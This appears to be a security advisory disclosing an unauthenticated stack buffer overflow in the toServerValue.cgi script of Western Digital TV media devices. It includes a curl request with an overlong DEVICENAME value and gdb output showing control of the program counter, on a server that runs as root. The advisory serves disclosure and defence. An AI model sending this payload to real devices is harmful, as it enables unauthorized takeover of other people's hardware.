Tenable discovered an unauthenticated stack buffer overflow in the Western Digital TV Media Player and Live Hub Media Center products. Tenable discovered this vulnerability while analyzing SEC Consult's Western Digital TV Media Player security advisory.
A common idiom used throughout the WD Media device web interface is to respond with a 403 Forbidden error to any request that is not from the LAN. However, this restriction doesn't appear to apply to the cgi scripts in /cgi-bin/. One of these cgi scripts processes JSON data that is sent to it. For example, the following request changes the device's name:
albinolobster@ubuntu:~$ curl -v -d '{ "DEVICENAME": "lol" }' http://192.168.1.93/cgi-bin/toServerValue.cgi
* Trying 192.168.1.93...
* Connected to 192.168.1.93 (192.168.1.93) port 80 (#0)
> POST /cgi-bin/toServerValue.cgi HTTP/1.1
> Host: 192.168.1.93
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 23
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 23 out of 23 bytes
< HTTP/1.1 200 OK
< Date: Mon, 9 Oct 2017 20:09:22 GMT
< Server: Apache
< Debug: haha
< X-Orion-Version: 1.0
< Transfer-Encoding: chunked
< Content-Type: text/html;charset=iso-8859-1;debug:[{ "DEVICENAME": "lol" }]
<
{ "success": 1 }
* Connection #0 to host 192.168.1.93 left intact
When a large string is placed in the device name field a stack buffer overflow occurs. As such this request:
curl -v -d '{"DEVICENAME":"WDLIVETVaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAA"}' http://192.168.1.93/cgi-bin/toServerValue.cgi
Results in the following crash:
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info registers
zero at v0 v1 a0 a1 a2 a3
R0 00000000 7618af0c 00000000 00000000 00408d00 76132948 004942b8 00000000
t0 t1 t2 t3 t4 t5 t6 t7
R8 000003ff 7611f540 00000002 76fff030 ffffffff 76ffef88 767d8b84 00440000
s0 s1 s2 s3 s4 s5 s6 s7
R16 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161
t8 t9 k0 k1 gp sp s8 ra
R24 00000068 7620ff20 00000000 00000000 76281950 76fff690 61616161 41414141
sr lo hi bad cause pc
20000010 000001df 00000292 41414140 00000000 41414141
fsr fir
00000000 00739300
The HTTP server is configured to run as root. As such, this stack buffer overflow can result in a complete compromise of the target device.